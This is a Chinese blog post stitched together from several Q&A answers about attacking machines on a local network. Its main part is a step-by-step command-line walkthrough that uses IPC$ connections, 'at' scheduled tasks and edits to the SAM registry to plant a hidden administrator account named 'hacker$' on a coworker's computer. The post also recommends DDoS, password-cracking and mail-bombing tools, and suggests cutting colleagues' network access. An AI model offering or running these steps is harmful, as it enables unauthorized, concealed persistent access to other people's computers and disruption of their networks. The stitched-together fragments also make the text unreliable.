作者:hacker发布时间:2022-10-06分类:破解邮箱浏览:309评论:5
检测到有攻击或嗅探软件,这说明其他电脑有arp防火墙设置或开启了类似软件。
一般向你的这种情况,避免同时上网是最好的办法。或者自己有独立的网线,其他方法不太奏效的。
聚生网管软件很好的使用也必须得付费的正式版才行的,另外你对网络最好是有合法的管理权才比较妥当哦。
首先,恶意软件是可以实现自动攻击的;其次,恶意软件也可以受控攻击。攻击发生时黑客可以远程操控完成,或者由恶意软件定时攻击设置。机房人员通过查阅相关日志可以发现攻击设备是计算机或者手机,主要通过识别攻击设备的OS系统来实现,比如安卓手机显示为Android,苹果手机显示为OS,台式计算机显示为WindowsXp等。另外通过被攻击者的IP地址可以知道来自于无线网络还是有线网络。这种行为由员工本身的恶意倾向导致的可能性较低,大多数都属于在不知道的情况下感染恶意程序导致的。希望能够帮助到你。
我可以告诉你一个办法不过需要对象的用户名和口令,还要知道他的IP
地址,只要你知道拿到账号和密码半个小时就可以搞定,以后你就有一个自己的隐藏管理员账户,随便进入他的电脑。
在这里将用at的命令,因为用at产生的计划任务是以系统身份运行的,所以也用不到psu.exe程序。为了能够使用at命令,肉鸡必须开有schedule的服务,如果没有开启,可用流光里带的工具netsvc.exe或sc.exe来远程启动,当然其方法也可以,只要能启动schedule服务就行。
对于命令行方式,你可以采用各种连接方式,如用SQLexec连接MSSQL的1433端口,也可以用telnet服务,只要以你能得到一个cmdshell,并且有运行at命令的权限就可以。
1.这里先假设他的用户名为administrator,密码为12345678,现在我们开始在命令行下远程为它建立隐藏的超级用户。(假设主机是局域网内的一台主机,ip地址为13.50.97.238,。)
2.先与他建立连接:
net
use
\\13.50.97.238\ipc$
"12345678"
/user:"Administrator”
3.用at命令在他的电脑建立一个用户(如果at服务没有启动,可用netsvc.exe或sc.exe来远程启动):
at
\\13.50.97.238
12:51
c:\windows\system32\net.exe
user
hacker$
1234
/add
建立这个加有$符的用户名,是因为加有$符后,命令行下用net
user将不显示这个用户,但在帐户管理器却能看到这个用户。
4.同样用at命令导出HKEY_LOCAL_MACHINE\sam\sam\Domains\account\users下键值:
at
\\13.50.97.238
12:55
c:\windows\regedit.exe
/e
hacker.reg
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\account\users
/e
是regedit.exe的参数,在这里HKEY_LOCAL_MACHINE\SAM\SAM\Domains\account\users这个键的一定不要以“\“结尾。必要的情况下可以用引号将"c:\windows\regedit.exe
/e
hacker.reg
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\account\users"引起来。
5.将他的电脑上的hacker.reg下载到本机上用记事本打开进行编辑命令为:
Copy
\\13.50.97.238\admin$\system32\hacker.reg
c:\hacker.reg
6.再将编辑好的hacker.reg拷回他的电脑上
copy
c:\hacker.reg
\\13.50.97.238\admin$\system32\hacker1.reg
7.查看他的电脑时间:net
time
\\13.50.97.238然后用at命令将用户hacker$删除:
at
\\13.50.97.238
13:40
net
user
hacker$
/del
8.验证hacker$是否删除:net
use
\\13.50.97.238
/del
断开与他的电脑连接。
再用net
use
\\13.50.97.238\ipc$
"1234"
/user:"hacker$"
用帐户hacker$与他电脑连接,不能连接说明已删除。
9.再与他电脑建立连接:
net
use
\\13.50.97.238\ipc$
"12345678"
/user:"administrator"
再取得他的时间,用at命令将拷回他的hacker1.reg导入他的注册表:
at
\\13.50.97.238
13:41
c:\windows\regedit.exe
/s
hacker1.reg
regedit.exe的参数/s是指安静模式。
10.再验证hacker$是否已建立,方法同上面验证hacker$是否被删除一样。
11.再验证用户hacker$是否有读、写、删除的权限,如果不放心,你还可验证是否能建立其它帐户。
12.通过步骤11可以断定用户hacker$具有超级用户权限,因为最初我用at命令建立它的时候是一个普通用户,而现在却具有远程读、写、删除的权限。
OK
以后你可以随意拿你的账号进入他电脑里游荡了~~~~~~~~~~~~~~~
流光——专用于win2000,轻松获得权限
DDOS——使服务器崩溃的最佳武器(就好多几台电脑一起)
X-CAN——扫描漏洞一点通
网络刺客——密码破解方便实用
KaBoom——对方服务器有邮箱?杀杀杀!
如果你不是很懂命令行的指令,建议你去下个p2p终结者,该软件容易上手。能很好的控制局域网内的资源流量,以及你所说的“攻击”。直接把他的网断了,就是最好的攻击,呵呵。有点过激了.....开开玩笑是可以的,千万别当真耽误工作。如果你能使用你们局域网的主机,在主机上使用效果很好。
换种方法,假如你知道你们局域网路由的访问口令,那个更直接,更效率。
请问者三思,任何后果概不负责。
标签:局域网服务器攻击软件
已有5位网友发表了看法:
访客 评论于 2022-10-06 12:07:07 回复
识别攻击设备的OS系统来实现,比如安卓手机显示为Android,苹果手机显示为OS,台式计算机显示为WindowsXp等。另外通过被攻击者的IP地址可以知道来自于无线网络还是有线网络。这种行为由员工本身的恶意倾向导
访客 评论于 2022-10-06 08:27:52 回复
用户。4.同样用at命令导出HKEY_LOCAL_MACHINE\sam\sam\Domains\account\users下键值:at\\13.50.97.23812:55c:\windows\regedit.exe/ehacker.regHKEY_LOCAL_MACHINE\S
访客 评论于 2022-10-06 13:32:04 回复
用户名,是因为加有$符后,命令行下用netuser将不显示这个用户,但在帐户管理器却能看到这个用户。4.同样用at命令导出HKEY_LOCAL_MACHINE\sam\sam\Domain
访客 评论于 2022-10-06 16:48:33 回复
\\13.50.97.238\ipc$"12345678"/user:"Administrator”3.用at命令在他的电脑建立一个用户(如果at服务没有启动,可用netsvc.exe或sc.exe来远程启动):at\\13.50.97.23812:51c:\
访客 评论于 2022-10-06 15:02:47 回复
xe或sc.exe来远程启动,当然其方法也可以,只要能启动schedule服务就行。对于命令行方式,你可以采用各种连接方式,如用SQLexec连接MSSQL的1433端口,也可以用telnet服务,只要以你能得到一个cmdsh